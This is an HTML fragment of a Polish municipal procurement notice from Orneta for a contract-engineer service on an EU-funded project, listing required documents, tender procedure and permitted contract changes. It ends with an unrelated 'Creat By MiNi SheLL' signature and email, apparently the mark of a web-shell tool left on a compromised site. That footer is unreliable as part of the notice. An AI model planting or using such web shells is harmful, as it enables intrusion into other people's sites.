<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Formularz oferty sporządzony wg Załącznika nr 1 do IDW
2)  Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru, a w przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia   publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
 3)  Kosztorys ofertowy opracowany zgodnie z § 12 IDW wg Załącznika nr 1 Rozdziału V SIWZ  
   4)  Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom  według załącznika nr 7 do IDW
   5)  Zastrzeżenie ochrony praw własności intelektualnej i tajemnicy handlowej sporządzone wg załącznika nr 8 do IDW</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2 Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian  zawartej umowy:
1) konieczność przedłużenia terminu umownego zakończenia przedmiotu zamówienia z uwagi na: 
a)wydłużenie  terminu zakończenia realizacji zadań objętych Projektem z przyczyn niezależnych od Inżyniera kontraktu 
b)opóźnienia w rozpoczęciu lub w trakcie realizacji Projektu , odbiorach Projektu, uzyskaniu pozwolenia na użytkowanie lub zgłoszenia zakończenia robót, końcowego rozliczenia Projektu - o ile opóźnienie nie wynika z przyczyn leżących po stronie Inżyniera kontraktu,
c)wystąpienia zmian w dokumentacji projektowej , wystąpienia robót dodatkowych lub zamiennych niezbędnych do wykonania Projektu, opóźniających lub wstrzymujących  realizację zamówienia podstawowego objętego umową z wykonawcą na realizację Projektu,  mających wpływ na uzgodniony termin zakończenia jego realizacji, 
d)przedłużenie procedury przetargowej, o ile nie wynika z przyczyn leżących po stronie Inżyniera kontraktu
e)uwarunkowania społeczne np. protesty, petycje, odwołania do KIO itp.
f)wystąpienie siły wyższej. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. 
o okres opóźniający lub wstrzymujący realizację zamówienia 
2)  zmianę wynagrodzenia Inżyniera kontraktu w przypadku:
a) zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia odbędzie się w wysokości odpowiadającej zmianie podatku:
3)  zmianę warunków płatności w przypadku zmiany warunków płatności dla Wykonawcy  Projektu:
4)  zmianę w zatrudnieniu podwykonawców w przypadku, gdy Inżynier kontraktu oświadczył, iż  wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa: 
5)  wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustanie stosunku pracy lub inne zdarzenie losowe i przyczyny niezależne od Inżyniera kontraktu) przy pomocy, których Inżynier kontraktu realizuje przedmiot umowy.  W wypadku zmiany osób przy pomocy, których Inżynier kontraktu realizuje przedmiot umowy  wymienionych w ofercie Inżyniera kontraktu, nowe osoby powołane do pełnienia obowiązków muszą spełniać na dzień składania ofert wymagania określone w SIWZ dla pełnienia danej funkcji:
6)  wystąpienia konieczności zmian osób Inżyniera kontraktu, w przypadku gdy Zamawiający uzna i  udowodni, że osoby te nie wykonują należycie swoich obowiązków. Inżynier kontraktu obowiązany jest dokonać zmiany tych osób, na nowe osoby spełniające na dzień składania ofert warunki określone w SIWZ dla pełnienia danej funkcji, w terminie określonym we wniosku  Zamawiającego;
7)  wystąpienia zmian powszechnie obowiązujących przepisów prawa , bądź wytycznych Instytucji Zarządzającej, Wdrażającej lub Pośredniczącej w zakresie mającym wpływ  na realizację przedmiotu umowy;
8)  wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
9) Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę:
10) Konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter)...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2012 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3.....</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  dofinansowany jest  z Europejskiego Funduszu Rozwoju Regionalnego w ramach: 
-   Regionalnego Programu Operacyjnego Warmia i Mazury 2007-2013 
Oś priorytetowa 1 Przedsiębiorczość
Działanie 1.1 Wzrost konkurencyjności przedsiębiorstw
Poddziałanie 1.1.10 Przygotowanie stref przedsiębiorczości
-   Programu Operacyjnego Innowacyjna Gospodarka  2007-2013
Oś priorytetowa 6 Polska gospodarka na rynku międzynarodowym
Działanie: 6.2. Rozwój sieci centrów obsługi inwestorów i eksporterów oraz powstanie nowych terenów inwestycyjnych
Poddziałanie 6.2.2 Wsparcie działań studyjno-koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com